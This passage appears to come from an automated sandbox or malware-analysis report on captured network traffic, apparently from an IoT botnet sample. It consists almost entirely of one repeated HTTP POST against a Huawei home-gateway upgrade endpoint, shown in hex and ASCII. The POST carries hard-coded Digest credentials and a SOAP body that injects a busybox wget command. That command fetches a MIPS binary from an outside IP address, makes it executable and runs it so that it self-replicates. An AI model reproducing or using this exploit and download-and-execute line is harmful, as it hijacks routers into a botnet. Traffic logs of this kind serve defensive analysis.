65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 